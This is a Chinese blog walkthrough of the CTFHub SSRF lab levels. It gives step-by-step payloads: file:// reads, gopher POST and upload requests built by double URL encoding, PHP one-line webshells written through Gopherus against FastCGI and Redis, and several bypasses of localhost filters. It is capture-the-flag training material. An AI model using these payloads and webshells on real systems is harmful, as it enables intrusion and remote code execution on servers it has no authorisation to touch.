CTFHUB靶场关于SSRF保姆级攻略

cr.sheeper2024-12-18 8:17

一.内网访问

输入127.0.0.1/flag.php

二.伪协议读取文件

输入?url=file:///var/www/html/flag.php

右键页面查看源代码

三.端口扫描

尝试一下index.php,没有显示,说明有这个文件

上方题中提示我们端口在8000-9000中我们用burp suite抓包,开启代理

输入?url=127.0.0.1:8000/index.php

右键空白处,发送到intruder,选中端口8000,再点击添加payload

在进入到payload中,按照下图填选,选中。

我们看这个200响应码的,去访问就会得到答案

四.POST请求

我们输入?url=http://127.0.0.1/flag.php

再查看页面源代码,我们发现有一个钥匙

复制下来,去把它放到白色框中,抓它的包,把下方图片的框中的内容全部删掉

然后改成向下方图一样的字样

再将这些数据复制下来,去进行第一次url编码

地址:CTF在线工具-在线URL编码|URL解码

将编码后的内容复制下来去打开记事本,粘贴下来,点击替换

将%0a替换为%0d%0a

再在最末尾也加上%0d%0a

将他们复制下来,进行第二次url编码

将二次编码的结果复制下来去原网址访问

将上方%253A换成冒号

回车

我们就会得到flag了

五.上传文件

上方提示我们需要上传文件

所以我们输入?url=file:///var/www/html/flag.php

就会得到下方图片的内容

这个需要我们写一个一句话木马文件上传,但是没有提交按钮,我们来自己构造一个

右键选择检查,在下方框中添加<input type="submit" name="submit">再点击空白处

就会出现一个按钮

我们创建一个名为1.php的文件,里面

输入<?php @eval($_POST[cmd]); ?>

保存后带年纪浏览,选中这个木马文件,这个时候打开代理,准备抓包

下方就是我们抓到的数据包

与POST请求关卡相似,改成下方的模样

全部复制下来,进行第一次url编码

将结果复制,打开记事本,把%0a替换为%0d%0a,再把结尾加上%0d%0a

全部复制下来,再去进行第二次url编码

将结果复制下来,去访问,记得把%253A换成冒号,就得到flag了

六.FastCGI协议

这里有一个题目附录,在这关我们需要用到一款名为Gopherus工具,还需要用到python2的环境,我这里是在kali做的,工具大家自己去下载

在kali中,点进这个工具

在这里打开终端

输入python2 gopherus.py查看一下用法

了解之后,我们在

输入python2 gopherus.py --exploit fastcgi

在上方输入/var/www/html/index.php

这里我们上传一个一句话木马,利用base64编码一下

在输入echo "PD9waHAgQHN5c3RlbSgkX0dFVFsnYSddKTsgPz4=" | base64 -d > 666.php

将下方框中的内容复制下来

在进行一次url编码

出现上访的情况就说明写进去了

在输入666.php?a=ls%20../../../;

我们会看到一个flag_617c826d2c56425e32808f1b4afefafb的文件,cat一下,得到flag

七.Redis

这关与上一关相似

输入python2 gopherus.py --exploit redis

输入PHPshell

输入/var/www/html或者直接回车

输入<?php @eval($_POST[a]) ?>或者直接回车

进行url编码

将结果复制下来,去访问

这里我们直接点旁边的X,结束,在访问一下shell.php,看看我们的木马是否写进去了

这就说明我们的木马已经写进去了,这回我们用蚁剑连一下

我们来到根目录,向下翻,看见了一个flag_25a71a953929896cac24e78b3f84d6dd文件

点进去,就发现了flag

八.URL Bypass

这里给出了提示

输入?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

上方的@表示左边的当成用户,右边的是网址,而提示又说必须用http://notfound.ctfhub.com才能访问,所以我们用一个@就可以解决

九.数字IP Bypass

输入?url=127.0.0.1/flag.php

我们发现它ban掉了127,172,@

所以我们用16进制来代替127.0.0.1

输入?url=0x7F000001/flag.php

十.302跳转 Bypass

输入?url=http://0.0.0.0/flag.php

或者

输入

十一.DNS重绑定 Bypass

在B输入127.0.0.2

回车

将下方红框中的复制

访问?url=http://7f000001.7f000002.rbndr.us/flag.php得出flag

以上就是SSRF的全部通关攻略!!!

相关推荐
南山十一少8 分钟前
Spring Security+JWT+Redis实现项目级前后端分离认证授权
java·spring·bootstrap
427724002 小时前
IDEA使用git不提示账号密码登录,而是输入token问题解决
java·git·intellij-idea
chengooooooo2 小时前
苍穹外卖day8 地址上传 用户下单 订单支付
java·服务器·数据库
李长渊哦2 小时前
常用的 JVM 参数:配置与优化指南
java·jvm
计算机小白一个2 小时前
蓝桥杯 Java B 组之设计 LRU 缓存
java·算法·蓝桥杯
希忘auto3 小时前
详解Redis在Centos上的安装
redis·centos
南宫生5 小时前
力扣每日一题【算法学习day.132】
java·学习·算法·leetcode
计算机毕设定制辅导-无忧学长5 小时前
Maven 基础环境搭建与配置(一)
java·maven
风与沙的较量丶6 小时前
Java中的局部变量和成员变量在内存中的位置
java·开发语言
m0_748251726 小时前
SpringBoot3 升级介绍
java
热门推荐
01DeepSeek各版本说明与优缺点分析02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)05本地部署DeepSeek教程(Mac版本)06DeepSeek r1本地安装全指南07DeepSeek RAGFlow构建本地知识库系统08本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10【docker】Windows10安装Docker Desktop - WSL update failed